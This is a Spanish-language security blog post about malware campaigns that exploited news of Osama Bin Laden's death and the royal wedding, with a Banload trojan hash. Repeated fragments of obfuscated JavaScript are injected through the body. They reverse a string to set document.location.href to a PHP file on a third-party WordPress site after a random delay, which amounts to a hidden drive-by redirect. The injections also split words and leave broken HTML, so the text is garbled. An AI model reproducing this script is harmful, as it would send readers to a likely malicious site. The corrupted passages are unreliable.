Como avisabamos, ya son varios los mails que estan propagando en base a la muerte de Osama Bin Laden, con malware incluido
Bin Laden continúa “vivo” gracias a las artimañas de los “hackers” informáticos
Los ciberdelincuentes aprovechan la conmoción mundial provocada por el anuncio de la muerte del líder terrorista. Emplean técnicas de ingeniería social para conseguir usuarios incautos y estafarlos con videos e imágenes falsas de la cabeza de la organizacíón Al Qaeda
El presidente estadounidense Barack Obama realizó una conferencia de prensa sorpresiva el domingo para anunciar que fuerzas armadas de su país se enfrentaron y mataron a tiros al líder de Al Qaeda, Osama Bin Laden, en Pakistán.
La noticia tuvo, al instante, enorme impacto internacional y sobre ella se estará hablando en los próximos días. Y quienes más se refregaron las manos, contentos por la inmediata ventana de oportunidades para hacer grandes negocios, que se les abría delante de ellos, fueron los delincuentes informáticos.
Sebastián Bortnik, coordinador de Awareness & Research, explicó que, en primer lugar, se detectaron algunos foros en inglés con supuestas imágenes del cuerpo del terrorista ahorcado, obtenidas por periodistas:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos/png/2011/05/342450.png” alt=”” width=”612″ height=”662″ /></p>
<p>El enlace en la imagen superior ya fue deshabilitado. Se trataba de un troyano detectado como Win32/Hackarmy.</p>
<p>Como se puede ver, un usuario del foro avisó al res<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to de los lectores que el enlace era malicioso. Claramente, la curiosidad de los usuarios sigue siendo vital para los atacantes.
Además, desde este lunes se observan algunos ataques que también utilizan la muerte de Bin Laden como excusa para propagar malware.
En esta ocasión, se trata de un correo en portugués, que tiene como título (traducido al español) “Ver video en el que Osama bin Laden aparece sosteniendo un periódico con la fecha de hoy y desmiente su posible muerte reportada por Obama”:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos/png/2011/05/342451.png” alt=”” width=”612″ height=”162″ /></p>
<p>El enlace, según explicó Bortnik, ofrece la descarga de un archivo, un troyano bancario como probablemente una variante de Win32/TrojanDownloader.Banload.</p>
<p>Si se analiza el servidor donde se descarga dicho archivo, puede observarse que desde la misma carpeta se puede bajar otro, basado en la boda real (un supues<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to video de la princesa con un amante previo al casamiento):
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos/png/2011/05/342452.png” alt=”” width=”612″ height=”122″ /></p>
<p>Si se observa en detalle, se notará que el lunes fue agregado el segundo documen<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to (de Osama Bin Laden) y que ambos tienen el mismo peso.
Al descargarlos, Bortnik pudo comprobar que dichos archivos poseen el mismo MD5 (9EE8023B94D6186F09857DBDAD14ED09), es decir, es la misma amenaza y sólo fue modificado el nombre.
También se pudieron identificar ataques en español en Facebook que, por el momento, no poseen malware pero sí enlaces publicitarios indeseados, y probables amenazas del tipo scam:
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tos/png/2011/05/342453.png” alt=”” width=”612″ height=”192″ /><br />
“Ya no sólo los atacantes del res<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
to del mundo están atentos a las últimas noticias, sino también estamos viendo ataques desarrollados desde América latina para aprovechar la propagación de malware”, señaló el especialista.
A su vez, es de esperarse que también aparezcan ataques de BlackHat SEO relacionados al tema, incluso en español. Uno de ellos consiste en romper las reglas establecidas por los buscadores y afectar la experiencia de usuario de forma negativa, debido a la aplicación de algunas de estas técnicas.
“Ante este tipo de noticias, es indispensable que los usuarios estén atentos y tengan en cuenta las buenas prácticas en Internet, de forma tal de no exponerse a este tipo de amenazas. Osama Bin Laden está muerto, pero el malware está vivo”, concluyó Bortnik.
Fuente
Comentario:
Ya indicamos que no se tenía que ser curioso y dejar estar mails y links al respecto, pero si alguien duda de que puede haber sido infectado por alguno de los ficheros del Banload, bien por el mail relativo a OBAMA o por el de la BODA , puede lanzar nuestro ELIMD5.EXE con esta cadena: 9EE8023B94D6186F09857DBDAD14ED09 y si detecta algun fichero lo moverá a C:\muestras, desde donde poder enviarnoslo para controlarlo.
saludos
ms, 3-5-2011
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.